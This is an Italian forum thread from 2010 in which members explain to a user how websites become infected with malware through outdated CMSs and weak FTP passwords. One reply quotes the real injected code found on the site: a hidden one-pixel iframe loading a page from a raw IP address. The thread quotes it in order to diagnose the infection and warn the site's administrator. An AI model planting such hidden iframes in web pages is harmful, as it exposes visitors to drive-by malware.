Web4Web.IT - Community Forums
Malware - Versione stampabile

+- Web4Web.IT - Community Forums (https://www.web4web.it/forum)
+-- Forum: Altri argomenti (/forum-16.html)
+--- Forum: Bar Sport (/forum-12.html)
+--- Discussione: Malware (/thread-135.html)

1 2


Malware - Elisabetta - 29-01-2010 18:25

Ho appena visitato un sito (che non so se posso citare).
Mi si è aperta una finestra con un messaggio di avvertenza sulla dannosità del suddetto dominio in quanto contenente un malware etc etc.

Ho fatto qualche ricerca e ho letto che il sito "ha contenuto un malware fino a 90 giorni fa"... (così ho interpretato il messaggio)

Inoltre viene anche fatto un elenco degli altri "siti infettati"...

Qualcuno mi sa spiegare come viene infettato un sito?
Mi viene da pensare "con un upload di un virus da parte dell'amministratore o peggio di qualche utente"...

Altro per chiarirmi le idee?

Non ricordo quale pannello permetteva lo scan del proprio spazio per individuare virus. Con Direct Admin non è possibile?

Grazie a chiunque voglia darmi qualche dritta!


RE: Malware - Gandalf - 30-01-2010 00:49

Ciao Elisabetta.
Posta pure il sito.

Comunque sia, al giorno d'oggi i siti vengono "infettati" tramite CMS buggati e non aggiornati da parte degli utenti (wordpress e joomla in primis) e/o grazie a password FTP troppo scadenti.

Solitamente il malintenzionato sostituisce la homepage del sito inserendo del codice javascript malevolo a fine pagina che spesso comporta a dei redirect su siti pedo-pornografici.

Non è la prima volta che la Polizia Postale ci fa staccare dei siti e/o fornire tutti i log di accesso.

Quando alla scansione, difficilmente i moderni antivirus riescono ad identificare il problema. Si tratta nel 99% dei casi di Javascript, che alla fin fine è codice legittimo. E' il sito a cui si fa il redirect che lo rende malevolo. In pratica, se il redirect fosse fatto verso google, il codice sarebbe perfettamente legittimo, se, invece, il redirect lo fai ad un sito pedopornografico è tutta un altra storia.
Ma non è il codice ad essere malevolo.

Alcune varianti anzichè fare un redirect inseriscono immagini nel sito dell'utente caricandole direttamente da siti osceni.

(per semplificare molto...)


RE: Malware - Gandalf - 30-01-2010 00:50

(30-01-2010 00:49)Gandalf Ha scritto:  : https://www.web4web.it/forum/post-1002.html#pid1002Ciao Elisabetta.
Posta pure il sito. Ma è da noi?

Comunque sia, al giorno d'oggi i siti vengono "infettati" tramite CMS buggati e non aggiornati da parte degli utenti (wordpress e joomla in primis) e/o grazie a password FTP troppo scadenti.

Solitamente il malintenzionato sostituisce la homepage del sito inserendo del codice javascript malevolo a fine pagina che spesso comporta a dei redirect su siti pedo-pornografici.

Non è la prima volta che la Polizia Postale ci fa staccare dei siti e/o fornire tutti i log di accesso.

Quando alla scansione, difficilmente i moderni antivirus riescono ad identificare il problema. Si tratta nel 99% dei casi di Javascript, che alla fin fine è codice legittimo. E' il sito a cui si fa il redirect che lo rende malevolo. In pratica, se il redirect fosse fatto verso google, il codice sarebbe perfettamente legittimo, se, invece, il redirect lo fai ad un sito pedopornografico è tutta un altra storia.
Ma non è il codice ad essere malevolo.

Alcune varianti anzichè fare un redirect inseriscono immagini nel sito dell'utente caricandole direttamente da siti osceni.

(per semplificare molto...)



RE: Malware - Pirosauro - 30-01-2010 11:35

(30-01-2010 00:50)Gandalf Ha scritto:  : https://www.web4web.it/forum/post-1003.html#pid1003Posta pure il sito. Ma è da noi?

qui ci sono solo siti di qualità Big Grin


RE: Malware - Elisabetta - 30-01-2010 12:51

Grazie Gandalf,
sempre chiaro e gentile... smacchi anche in profondità?

Il sito non so se è da voi... ad ogni modo mi compare per qualche secondo e poi si oscura tutto con l'avviso che mi chiede se voglio proseguire a mio rischio e pericolo oppure uscire fuori.

Te lo invio in pvt.


RE: Malware - Pirosauro - 30-01-2010 14:04

grazie ad Elisabetta, che ha passato il link anche a me Tooth
il problema è questo codice:

Codice HTML:
<iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>


da una veloce ricerca, sembra che sia dovuto ad un malaware installato nel pc di chi ha accesso ai template, il quale aggiunge un frame malevolo al codice html
Sarebbe meglio avvertire l'ammistratore del sito, perchè la minaccia è ancora presente.


RE: Malware - Elisabetta - 30-01-2010 14:18

Semplicemente fantastici!

Grazie!


...vedrò di contattare l'amministratore!


RE: Malware - Elisabetta - 01-02-2010 11:47

...ho contattato l'amministratore... mi è arrivata la conferma lettura (ma senza una risposta di ringraziamento...Confused )

Adesso il sito non è raggiungibile, compare la pagina del loro gestore hosting... Angel


....giusto per aggiornarvi...


RE: Malware - Pirosauro - 01-02-2010 15:54

(01-02-2010 11:47)Elisabetta Ha scritto:  : https://www.web4web.it/forum/post-1012.html#pid1012Adesso il sito non è raggiungibile, compare la pagina del loro gestore hosting... Angel

chi è ? Big Grin indagine di mercato Big Grin

probabilmente stanno facendo la cosa giusta: una re-installazione di tutto da zero.


RE: Malware - Elisabetta - 01-02-2010 22:52

(01-02-2010 15:54)Pirosauro Ha scritto:  : https://www.web4web.it/forum/post-1012.html#pid1012Adesso il sito non è raggiungibile, compare la pagina del loro gestore hosting... Angel

chi è ? Big Grin indagine di mercato Big Grin

probabilmente stanno facendo la cosa giusta: una re-installazione di tutto da zero.
Il link lo sai.. vai così lo scoprirai! Whistling
Ci sono stata anche io con loro, avevo un VPS... non sono affatto male. Devo essere sincera!

Una re-installazione da zero?
Huh Confused mi fa paura solo al pensiero!